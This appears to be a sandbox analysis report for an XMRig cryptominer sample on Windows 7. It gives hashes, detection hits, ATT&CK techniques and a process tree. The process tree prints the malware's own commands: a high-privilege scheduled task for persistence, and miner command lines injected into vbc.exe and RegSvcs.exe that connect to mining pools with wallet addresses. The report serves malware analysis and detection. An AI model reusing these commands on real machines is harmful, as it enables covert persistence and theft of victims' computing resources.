xmrig | 90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

Analysis

max time kernel
154s
max time network
177s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
14/03/2023, 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Size

903KB
MD5

7b205c65f9092ee01c821aa5b58bcc6b
SHA1

28f2aeded861c37d6fd90ddb791721a653079cfb
SHA256

90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA512

1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
SSDEEP

12288:8D5lJ0RelUsuvM/vPmyTIPjdgRSzYr9MUlu1vZdptUG5decIljrG:8D5lWYlUsuvMH+36e70

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detectes Phoenix Miner Payload 5 IoCs

miner

resource	yara_rule
behavioral1/memory/1784-114-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/1784-115-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/1784-116-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/1784-117-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/1784-118-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

XMRig Miner payload 19 IoCs

miner

resource	yara_rule
behavioral1/memory/856-80-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-81-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-82-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-83-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-84-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-85-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-86-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-87-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-89-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-91-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-93-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-94-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-95-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-96-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-97-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-98-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-99-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-100-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/856-102-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
520	Y.exe

Loads dropped DLL 1 IoCs

pid	Process
272	cmd.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1784-108-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-109-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-111-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-112-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-113-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-114-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-115-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-116-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-117-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1784-118-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1784	RegSvcs.exe
1784	RegSvcs.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 520 set thread context of 856	520	Y.exe	36
PID 520 set thread context of 1784	520	Y.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1720	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1500	timeout.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
520	Y.exe
520	Y.exe
520	Y.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1064	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Token: SeDebugPrivilege	520	Y.exe
Token: SeLockMemoryPrivilege	856	vbc.exe
Token: SeLockMemoryPrivilege	856	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
856	vbc.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 1064 wrote to memory of 272	1064	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	28
PID 1064 wrote to memory of 272	1064	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	28
PID 1064 wrote to memory of 272	1064	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	28
PID 272 wrote to memory of 1500	272	cmd.exe	30
PID 272 wrote to memory of 1500	272	cmd.exe	30
PID 272 wrote to memory of 1500	272	cmd.exe	30
PID 272 wrote to memory of 520	272	cmd.exe	31
PID 272 wrote to memory of 520	272	cmd.exe	31
PID 272 wrote to memory of 520	272	cmd.exe	31
PID 520 wrote to memory of 1668	520	Y.exe	32
PID 520 wrote to memory of 1668	520	Y.exe	32
PID 520 wrote to memory of 1668	520	Y.exe	32
PID 1668 wrote to memory of 1720	1668	cmd.exe	34
PID 1668 wrote to memory of 1720	1668	cmd.exe	34
PID 1668 wrote to memory of 1720	1668	cmd.exe	34
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 856	520	Y.exe	36
PID 520 wrote to memory of 1784	520	Y.exe	37
PID 520 wrote to memory of 1784	520	Y.exe	37
PID 520 wrote to memory of 1784	520	Y.exe	37
PID 520 wrote to memory of 1784	520	Y.exe	37
PID 520 wrote to memory of 1784	520	Y.exe	37
PID 520 wrote to memory of 1784	520	Y.exe	37
PID 520 wrote to memory of 1784	520	Y.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
"C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7A0.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:272
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1500
- - C:\ProgramData\telemetry\Y.exe
    "C:\ProgramData\telemetry\Y.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:520
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1668
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1720
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:856
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 0
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:1784

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7A0.tmp.bat

Filesize
138B

MD5
76224dad88d6941ef219b717f40f2784

SHA1
a464e82a213d9c9fc9b265ebdf685b1cb9fe73e6

SHA256
535a0456975475f8d9ad405130234e329f23ed240f96758a4c223075149f3766

SHA512
08d38bf4b90c631bbc3ac59da95a045b171f7dab6a28194a93c033b3bca8e6c46b05f4ba3ba91de5797a72ae012a227002ed3ee4cbe97647fee5872d4c6dac48

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7A0.tmp.bat

Filesize
138B

MD5
76224dad88d6941ef219b717f40f2784

SHA1
a464e82a213d9c9fc9b265ebdf685b1cb9fe73e6

SHA256
535a0456975475f8d9ad405130234e329f23ed240f96758a4c223075149f3766

SHA512
08d38bf4b90c631bbc3ac59da95a045b171f7dab6a28194a93c033b3bca8e6c46b05f4ba3ba91de5797a72ae012a227002ed3ee4cbe97647fee5872d4c6dac48

Download Submit
\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
memory/520-73-0x000000001BE30000-0x000000001BEB0000-memory.dmp

Filesize
512KB

Download
memory/520-69-0x0000000000120000-0x0000000000206000-memory.dmp

Filesize
920KB

Download
memory/520-72-0x000000001BE30000-0x000000001BEB0000-memory.dmp

Filesize
512KB

Download
memory/856-91-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-96-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-78-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-79-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-80-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-81-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-82-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-83-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-84-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-85-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-86-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-87-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-89-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-88-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

Filesize
4KB

Download
memory/856-103-0x0000000000300000-0x0000000000320000-memory.dmp

Filesize
128KB

Download
memory/856-92-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/856-93-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-94-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-95-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-77-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-97-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-98-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-99-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-100-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/856-101-0x0000000000300000-0x0000000000320000-memory.dmp

Filesize
128KB

Download
memory/856-102-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1064-54-0x0000000000B40000-0x0000000000C26000-memory.dmp

Filesize
920KB

Download
memory/1784-107-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-108-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-109-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-110-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/1784-111-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-112-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-113-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-114-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-115-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-116-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-117-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1784-118-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download